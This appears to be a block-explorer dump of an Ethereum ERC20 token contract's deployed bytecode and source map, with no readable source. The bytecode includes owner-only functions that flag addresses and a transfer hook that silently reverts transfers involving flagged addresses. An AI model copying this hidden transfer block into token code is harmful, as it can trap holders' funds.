b5b600083013567ffffffffffffffff811115611427576114266110a2565b5b6114338582860161139c565b92509250509250929050565b611448816110c7565b82525050565b6000602082019050611463600083018461143f565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114b057607f821691505b6020821081036114c3576114c2611469565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061150382611145565b915061150e83611145565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611543576115426114c9565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061158882611145565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036115ba576115b96114c9565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611621602583611184565b915061162c826115c5565b604082019050919050565b6000602082019050818103600083015261165081611614565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006116b3602683611184565b91506116be82611657565b604082019050919050565b600060208201905081810360008301526116e2816116a6565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611745602483611184565b9150611750826116e9565b604082019050919050565b6000602082019050818103600083015261177481611738565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006117d7602283611184565b91506117e28261177b565b604082019050919050565b60006020820190508181036000830152611806816117ca565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611843601d83611184565b915061184e8261180d565b602082019050919050565b6000602082019050818103600083015261187281611836565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006118d5602583611184565b91506118e082611879565b604082019050919050565b60006020820190508181036000830152611904816118c8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611967602383611184565b91506119728261190b565b604082019050919050565b600060208201905081810360008301526119968161195a565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119f9602683611184565b9150611a048261199d565b604082019050919050565b60006020820190508181036000830152611a28816119ec565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a65602083611184565b9150611a7082611a2f565b602082019050919050565b60006020820190508181036000830152611a9481611a58565b9050919050565b50565b6000611aab600083611184565b9150611ab682611a9b565b600082019050919050565b60006020820190508181036000830152611ada81611a9e565b905091905056fea2646970667358221220ec4d7310346d0f56677cfea235393cfade04f4a3b81b21bba297f372b9d3db8c64736f6c634300080d0033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101165760003560e01c806370a08231116100a2578063a457c2d711610071578063a457c2d7146102f7578063a9059cbb14610327578063dd62ed3e14610357578063eb08e52e14610387578063f2fde38b146103a357610116565b806370a0823114610281578063715018a6146102b15780638da5cb5b146102bb57806395d89b41146102d957610116565b806318160ddd116100e957806318160ddd146101c957806323b872dd146101e7578063313ce567146102175780633950935114610235578063464b04411461026557610116565b8063024c2ddd1461011b57806306fdde031461014b578063095ea7b3146101695780631409688b14610199575b600080fd5b61013560048036038101906101309190611105565b6103bf565b604051610142919061115e565b60405180910390f35b6101536103e4565b6040516101609190611212565b60405180910390f35b610183600480360381019061017e9190611260565b610476565b60405161019091906112bb565b60405180910390f35b6101b360048036038101906101ae91906112d6565b610499565b6040516101c091906112bb565b60405180910390f35b6101d16104ef565b6040516101de919061115e565b60405180910390f35b61020160048036038101906101fc9190611303565b6104f9565b60405161020e91906112bb565b60405180910390f35b61021f610528565b60405161022c9190611372565b60405180910390f35b61024f600480360381019061024a9190611260565b610531565b60405161025c91906112bb565b60405180910390f35b61027f600480360381019061027a91906113f2565b610568565b005b61029b600480360381019061029691906112d6565b610615565b6040516102a8919061115e565b60405180910390f35b6102b961065e565b005b6102c3610672565b6040516102d0919061144e565b60405180910390f35b6102e161069b565b6040516102ee9190611212565b60405180910390f35b610311600480360381019061030c9190611260565b61072d565b60405161031e91906112bb565b60405180910390f35b610341600480360381019061033c9190611260565b6107a4565b60405161034e91906112bb565b60405180910390f35b610371600480360381019061036c9190611105565b6107c7565b60405161037e919061115e565b60405180910390f35b6103a1600480360381019061039c91906113f2565b61084e565b005b6103bd60048036038101906103b891906112d6565b6108fb565b005b6003602052816000526040600020602052806000526040600020600091509150505481565b6060600680546103f390611498565b80601f016020809104026020016040519081016040528092919081815260200182805461041f90611498565b801561046c5780601f106104415761010080835404028352916020019161046c565b820191906000526020600020905b81548152906001019060200180831161044f57829003601f168201915b5050505050905090565b60008061048161097e565b905061048e818585610986565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600454905090565b60008061050461097e565b9050610511858285610b4f565b61051c858585610bdb565b60019150509392505050565b60006012905090565b60008061053c61097e565b905061055d81858561054e85896107c7565b61055891906114f8565b610986565b600191505092915050565b610570610e54565b60005b82829050811015610610576001600260008585858181106105975761059661154e565b5b90506020020160208101906105ac91906112d6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806106089061157d565b915050610573565b505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610666610e54565b6106706000610ed2565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546106aa90611498565b80601f01602080910402602001604051908101604052809291908181526020018280546106d690611498565b80156107235780601f106106f857610100808354040283529160200191610723565b820191906000526020600020905b81548152906001019060200180831161070657829003601f168201915b5050505050905090565b60008061073861097e565b9050600061074682866107c7565b90508381101561078b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161078290611637565b60405180910390fd5b6107988286868403610986565b60019250505092915050565b6000806107af61097e565b90506107bc818585610bdb565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610856610e54565b60005b828290508110156108f65760006002600085858581811061087d5761087c61154e565b5b905060200201602081019061089291906112d6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806108ee9061157d565b915050610859565b505050565b610903610e54565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610972576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610969906116c9565b60405180910390fd5b61097b81610ed2565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ec9061175b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a5b906117ed565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b42919061115e565b60405180910390a3505050565b6000610b5b84846107c7565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610bd55781811015610bc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bbe90611859565b60405180910390fd5b610bd48484848403610986565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c4a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c41906118eb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cb9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb09061197d565b60405180910390fd5b610cc4838383610f96565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4290611a0f565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e3b919061115e565b60405180910390a3610e4e848484610f9b565b50505050565b610e5c61097e565b73ffffffffffffffffffffffffffffffffffffffff16610e7a610672565b73ffffffffffffffffffffffffffffffffffffffff1614610ed0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec790611a7b565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061103c5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110985760011515600560009054906101000a900460ff16151514611097576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161108e90611ac1565b60405180910390fd5b5b505050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006110d2826110a7565b9050919050565b6110e2816110c7565b81146110ed57600080fd5b50565b6000813590506110ff816110d9565b92915050565b6000806040838503121561111c5761111b61109d565b5b600061112a858286016110f0565b925050602061113b858286016110f0565b9150509250929050565b6000819050919050565b61115881611145565b82525050565b6000602082019050611173600083018461114f565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156111b3578082015181840152602081019050611198565b838111156111c2576000848401525b50505050565b6000601f19601f8301169050919050565b60006111e482611179565b6111ee8185611184565b93506111fe818560208601611195565b611207816111c8565b840191505092915050565b6000602082019050818103600083015261122c81846111d9565b905092915050565b61123d81611145565b811461124857600080fd5b50565b60008135905061125a81611234565b92915050565b600080604083850312156112775761127661109d565b5b6000611285858286016110f0565b92505060206112968582860161124b565b9150509250929050565b60008115159050919050565b6112b5816112a0565b82525050565b60006020820190506112d060008301846112ac565b92915050565b6000602082840312156112ec576112eb61109d565b5b60006112fa848285016110f0565b91505092915050565b60008060006060848603121561131c5761131b61109d565b5b600061132a868287016110f0565b935050602061133b868287016110f0565b925050604061134c8682870161124b565b9150509250925092565b600060ff82169050919050565b61136c81611356565b82525050565b60006020820190506113876000830184611363565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126113b2576113b161138d565b5b8235905067ffffffffffffffff8111156113cf576113ce611392565b5b6020830191508360208202830111156113eb576113ea611397565b5b9250929050565b600080602083850312156114095761140861109d565b5b600083013567ffffffffffffffff811115611427576114266110a2565b5b6114338582860161139c565b92509250509250929050565b611448816110c7565b82525050565b6000602082019050611463600083018461143f565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114b057607f821691505b6020821081036114c3576114c2611469565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061150382611145565b915061150e83611145565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611543576115426114c9565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061158882611145565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036115ba576115b96114c9565b5b600182019050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611621602583611184565b915061162c826115c5565b604082019050919050565b6000602082019050818103600083015261165081611614565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006116b3602683611184565b91506116be82611657565b604082019050919050565b600060208201905081810360008301526116e2816116a6565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611745602483611184565b9150611750826116e9565b604082019050919050565b6000602082019050818103600083015261177481611738565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006117d7602283611184565b91506117e28261177b565b604082019050919050565b60006020820190508181036000830152611806816117ca565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611843601d83611184565b915061184e8261180d565b602082019050919050565b6000602082019050818103600083015261187281611836565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006118d5602583611184565b91506118e082611879565b604082019050919050565b60006020820190508181036000830152611904816118c8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611967602383611184565b91506119728261190b565b604082019050919050565b600060208201905081810360008301526119968161195a565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119f9602683611184565b9150611a048261199d565b604082019050919050565b60006020820190508181036000830152611a28816119ec565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a65602083611184565b9150611a7082611a2f565b602082019050919050565b60006020820190508181036000830152611a9481611a58565b9050919050565b50565b6000611aab600083611184565b9150611ab682611a9b565b600082019050919050565b60006020820190508181036000830152611ada81611a9e565b905091905056fea2646970667358221220ec4d7310346d0f56677cfea235393cfade04f4a3b81b21bba297f372b9d3db8c64736f6c634300080d0033
Deployed Bytecode Sourcemap
20555:172:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8086:66;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8804:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11642:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10246:100;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10411:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12423:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9766:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13127:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9867:180;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10582:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5914:103;;;:::i;:::-;;5273:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9023:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13868:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10915:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11171:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10055:183;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6172:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8086:66;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;8804:100::-;8858:13;8891:5;8884:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8804:100;:::o;11642:201::-;11725:4;11742:13;11758:12;:10;:12::i;:::-;11742:28;;11781:32;11790:5;11797:7;11806:6;11781:8;:32::i;:::-;11831:4;11824:11;;;11642:201;;;;:::o;10246:100::-;10299:4;10323:7;:15;10331:6;10323:15;;;;;;;;;;;;;;;;;;;;;;;;;10316:22;;10246:100;;;:::o;10411:108::-;10472:7;10499:12;;10492:19;;10411:108;:::o;12423:295::-;12554:4;12571:15;12589:12;:10;:12::i;:::-;12571:30;;12612:38;12628:4;12634:7;12643:6;12612:15;:38::i;:::-;12661:27;12671:4;12677:2;12681:6;12661:9;:27::i;:::-;12706:4;12699:11;;;12423:295;;;;;:::o;9766:93::-;9824:5;9849:2;9842:9;;9766:93;:::o;13127:238::-;13215:4;13232:13;13248:12;:10;:12::i;:::-;13232:28;;13271:64;13280:5;13287:7;13324:10;13296:25;13306:5;13313:7;13296:9;:25::i;:::-;:38;;;;:::i;:::-;13271:8;:64::i;:::-;13353:4;13346:11;;;13127:238;;;;:::o;9867:180::-;5159:13;:11;:13::i;:::-;9949:9:::1;9944:96;9968:6;;:13;;9964:1;:17;9944:96;;;10024:4;10003:7;:18;10011:6;;10018:1;10011:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10003:18;;;;;;;;;;;;;;;;:25;;;;;;;;;;;;;;;;;;9983:3;;;;;:::i;:::-;;;;9944:96;;;;9867:180:::0;;:::o;10582:127::-;10656:7;10683:9;:18;10693:7;10683:18;;;;;;;;;;;;;;;;10676:25;;10582:127;;;:::o;5914:103::-;5159:13;:11;:13::i;:::-;5979:30:::1;6006:1;5979:18;:30::i;:::-;5914:103::o:0;5273:87::-;5319:7;5346:6;;;;;;;;;;;5339:13;;5273:87;:::o;9023:104::-;9079:13;9112:7;9105:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9023:104;:::o;13868:436::-;13961:4;13978:13;13994:12;:10;:12::i;:::-;13978:28;;14017:24;14044:25;14054:5;14061:7;14044:9;:25::i;:::-;14017:52;;14108:15;14088:16;:35;;14080:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;14201:60;14210:5;14217:7;14245:15;14226:16;:34;14201:8;:60::i;:::-;14292:4;14285:11;;;;13868:436;;;;:::o;10915:193::-;10994:4;11011:13;11027:12;:10;:12::i;:::-;11011:28;;11050;11060:5;11067:2;11071:6;11050:9;:28::i;:::-;11096:4;11089:11;;;10915:193;;;;:::o;11171:151::-;11260:7;11287:11;:18;11299:5;11287:18;;;;;;;;;;;;;;;:27;11306:7;11287:27;;;;;;;;;;;;;;;;11280:34;;11171:151;;;;:::o;10055:183::-;5159:13;:11;:13::i;:::-;10139:9:::1;10134:97;10158:6;;:13;;10154:1;:17;10134:97;;;10214:5;10193:7;:18;10201:6;;10208:1;10201:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10193:18;;;;;;;;;;;;;;;;:26;;;;;;;;;;;;;;;;;;10173:3;;;;;:::i;:::-;;;;10134:97;;;;10055:183:::0;;:::o;6172:201::-;5159:13;:11;:13::i;:::-;6281:1:::1;6261:22;;:8;:22;;::::0;6253:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6337:28;6356:8;6337:18;:28::i;:::-;6172:201:::0;:::o;3982:98::-;4035:7;4062:10;4055:17;;3982:98;:::o;17895:380::-;18048:1;18031:19;;:5;:19;;;18023:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18129:1;18110:21;;:7;:21;;;18102:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18213:6;18183:11;:18;18195:5;18183:18;;;;;;;;;;;;;;;:27;18202:7;18183:27;;;;;;;;;;;;;;;:36;;;;18251:7;18235:32;;18244:5;18235:32;;;18260:6;18235:32;;;;;;:::i;:::-;;;;;;;;17895:380;;;:::o;18566:453::-;18701:24;18728:25;18738:5;18745:7;18728:9;:25::i;:::-;18701:52;;18788:17;18768:16;:37;18764:248;;18850:6;18830:16;:26;;18822:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18934:51;18943:5;18950:7;18978:6;18959:16;:25;18934:8;:51::i;:::-;18764:248;18690:329;18566:453;;;:::o;14774:840::-;14921:1;14905:18;;:4;:18;;;14897:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;14998:1;14984:16;;:2;:16;;;14976:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;15053:38;15074:4;15080:2;15084:6;15053:20;:38::i;:::-;15104:19;15126:9;:15;15136:4;15126:15;;;;;;;;;;;;;;;;15104:37;;15175:6;15160:11;:21;;15152:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;15292:6;15278:11;:20;15260:9;:15;15270:4;15260:15;;;;;;;;;;;;;;;:38;;;;15495:6;15478:9;:13;15488:2;15478:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;15545:2;15530:26;;15539:4;15530:26;;;15549:6;15530:26;;;;;;:::i;:::-;;;;;;;;15569:37;15589:4;15595:2;15599:6;15569:19;:37::i;:::-;14886:728;14774:840;;;:::o;5438:132::-;5513:12;:10;:12::i;:::-;5502:23;;:7;:5;:7::i;:::-;:23;;;5494:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5438:132::o;6533:191::-;6607:16;6626:6;;;;;;;;;;;6607:25;;6652:8;6643:6;;:17;;;;;;;;;;;;;;;;;;6707:8;6676:40;;6697:8;6676:40;;;;;;;;;;;;6596:128;6533:191;:::o;20423:125::-;;;;:::o;19623:196::-;19752:7;:11;19760:2;19752:11;;;;;;;;;;;;;;;;;;;;;;;;;:28;;;;19767:7;:13;19775:4;19767:13;;;;;;;;;;;;;;;;;;;;;;;;;19752:28;19748:69;;;19808:4;19790:22;;:14;;;;;;;;;;;:22;;;19782:35;;;;;;;;;;;;:::i;:::-;;;;;;;;;19748:69;19623:196;;;:::o;88:117:1:-;197:1;194;187:12;211:117;320:1;317;310:12;334:126;371:7;411:42;404:5;400:54;389:65;;334:126;;;:::o;466:96::-;503:7;532:24;550:5;532:24;:::i;:::-;521:35;;466:96;;;:::o;568:122::-;641:24;659:5;641:24;:::i;:::-;634:5;631:35;621:63;;680:1;677;670:12;621:63;568:122;:::o;696:139::-;742:5;780:6;767:20;758:29;;796:33;823:5;796:33;:::i;:::-;696:139;;;;:::o;841:474::-;909:6;917;966:2;954:9;945:7;941:23;937:32;934:119;;;972:79;;:::i;:::-;934:119;1092:1;1117:53;1162:7;1153:6;1142:9;1138:22;1117:53;:::i;:::-;1107:63;;1063:117;1219:2;1245:53;1290:7;1281:6;1270:9;1266:22;1245:53;:::i;:::-;1235:63;;1190:118;841:474;;;;;:::o;1321:77::-;1358:7;1387:5;1376:16;;1321:77;;;:::o;1404:118::-;1491:24;1509:5;1491:24;:::i;:::-;1486:3;1479:37;1404:118;;:::o;1528:222::-;1621:4;1659:2;1648:9;1644:18;1636:26;;1672:71;1740:1;1729:9;1725:17;1716:6;1672:71;:::i;:::-;1528:222;;;;:::o;1756:99::-;1808:6;1842:5;1836:12;1826:22;;1756:99;;;:::o;1861:169::-;1945:11;1979:6;1974:3;1967:19;2019:4;2014:3;2010:14;1995:29;;1861:169;;;;:::o;2036:307::-;2104:1;2114:113;2128:6;2125:1;2122:13;2114:113;;;2213:1;2208:3;2204:11;2198:18;2194:1;2189:3;2185:11;2178:39;2150:2;2147:1;2143:10;2138:15;;2114:113;;;2245:6;2242:1;2239:13;2236:101;;;2325:1;2316:6;2311:3;2307:16;2300:27;2236:101;2085:258;2036:307;;;:::o;2349:102::-;2390:6;2441:2;2437:7;2432:2;2425:5;2421:14;2417:28;2407:38;;2349:102;;;:::o;2457:364::-;2545:3;2573:39;2606:5;2573:39;:::i;:::-;2628:71;2692:6;2687:3;2628:71;:::i;:::-;2621:78;;2708:52;2753:6;2748:3;2741:4;2734:5;2730:16;2708:52;:::i;:::-;2785:29;2807:6;2785:29;:::i;:::-;2780:3;2776:39;2769:46;;2549:272;2457:364;;;;:::o;2827:313::-;2940:4;2978:2;2967:9;2963:18;2955:26;;3027:9;3021:4;3017:20;3013:1;3002:9;2998:17;2991:47;3055:78;3128:4;3119:6;3055:78;:::i;:::-;3047:86;;2827:313;;;;:::o;3146:122::-;3219:24;3237:5;3219:24;:::i;:::-;3212:5;3209:35;3199:63;;3258:1;3255;3248:12;3199:63;3146:122;:::o;3274:139::-;3320:5;3358:6;3345:20;3336:29;;3374:33;3401:5;3374:33;:::i;:::-;3274:139;;;;:::o;3419:474::-;3487:6;3495;3544:2;3532:9;3523:7;3519:23;3515:32;3512:119;;;3550:79;;:::i;:::-;3512:119;3670:1;3695:53;3740:7;3731:6;3720:9;3716:22;3695:53;:::i;:::-;3685:63;;3641:117;3797:2;3823:53;3868:7;3859:6;3848:9;3844:22;3823:53;:::i;:::-;3813:63;;3768:118;3419:474;;;;;:::o;3899:90::-;3933:7;3976:5;3969:13;3962:21;3951:32;;3899:90;;;:::o;3995:109::-;4076:21;4091:5;4076:21;:::i;:::-;4071:3;4064:34;3995:109;;:::o;4110:210::-;4197:4;4235:2;4224:9;4220:18;4212:26;;4248:65;4310:1;4299:9;4295:17;4286:6;4248:65;:::i;:::-;4110:210;;;;:::o;4326:329::-;4385:6;4434:2;4422:9;4413:7;4409:23;4405:32;4402:119;;;4440:79;;:::i;:::-;4402:119;4560:1;4585:53;4630:7;4621:6;4610:9;4606:22;4585:53;:::i;:::-;4575:63;;4531:117;4326:329;;;;:::o;4661:619::-;4738:6;4746;4754;4803:2;4791:9;4782:7;4778:23;4774:32;4771:119;;;4809:79;;:::i;:::-;4771:119;4929:1;4954:53;4999:7;4990:6;4979:9;4975:22;4954:53;:::i;:::-;4944:63;;4900:117;5056:2;5082:53;5127:7;5118:6;5107:9;5103:22;5082:53;:::i;:::-;5072:63;;5027:118;5184:2;5210:53;5255:7;5246:6;5235:9;5231:22;5210:53;:::i;:::-;5200:63;;5155:118;4661:619;;;;;:::o;5286:86::-;5321:7;5361:4;5354:5;5350:16;5339:27;;5286:86;;;:::o;5378:112::-;5461:22;5477:5;5461:22;:::i;:::-;5456:3;5449:35;5378:112;;:::o;5496:214::-;5585:4;5623:2;5612:9;5608:18;5600:26;;5636:67;5700:1;5689:9;5685:17;5676:6;5636:67;:::i;:::-;5496:214;;;;:::o;5716:117::-;5825:1;5822;5815:12;5839:117;5948:1;5945;5938:12;5962:117;6071:1;6068;6061:12;6102:568;6175:8;6185:6;6235:3;6228:4;6220:6;6216:17;6212:27;6202:122;;6243:79;;:::i;:::-;6202:122;6356:6;6343:20;6333:30;;6386:18;6378:6;6375:30;6372:117;;;6408:79;;:::i;:::-;6372:117;6522:4;6514:6;6510:17;6498:29;;6576:3;6568:4;6560:6;6556:17;6546:8;6542:32;6539:41;6536:128;;;6583:79;;:::i;:::-;6536:128;6102:568;;;;;:::o;6676:559::-;6762:6;6770;6819:2;6807:9;6798:7;6794:23;6790:32;6787:119;;;6825:79;;:::i;:::-;6787:119;6973:1;6962:9;6958:17;6945:31;7003:18;6995:6;6992:30;6989:117;;;7025:79;;:::i;:::-;6989:117;7138:80;7210:7;7201:6;7190:9;7186:22;7138:80;:::i;:::-;7120:98;;;;6916:312;6676:559;;;;;:::o;7241:118::-;7328:24;7346:5;7328:24;:::i;:::-;7323:3;7316:37;7241:118;;:::o;7365:222::-;7458:4;7496:2;7485:9;7481:18;7473:26;;7509:71;7577:1;7566:9;7562:17;7553:6;7509:71;:::i;:::-;7365:222;;;;:::o;7593:180::-;7641:77;7638:1;7631:88;7738:4;7735:1;7728:15;7762:4;7759:1;7752:15;7779:320;7823:6;7860:1;7854:4;7850:12;7840:22;;7907:1;7901:4;7897:12;7928:18;7918:81;;7984:4;7976:6;7972:17;7962:27;;7918:81;8046:2;8038:6;8035:14;8015:18;8012:38;8009:84;;8065:18;;:::i;:::-;8009:84;7830:269;7779:320;;;:::o;8105:180::-;8153:77;8150:1;8143:88;8250:4;8247:1;8240:15;8274:4;8271:1;8264:15;8291:305;8331:3;8350:20;8368:1;8350:20;:::i;:::-;8345:25;;8384:20;8402:1;8384:20;:::i;:::-;8379:25;;8538:1;8470:66;8466:74;8463:1;8460:81;8457:107;;;8544:18;;:::i;:::-;8457:107;8588:1;8585;8581:9;8574:16;;8291:305;;;;:::o;8602:180::-;8650:77;8647:1;8640:88;8747:4;8744:1;8737:15;8771: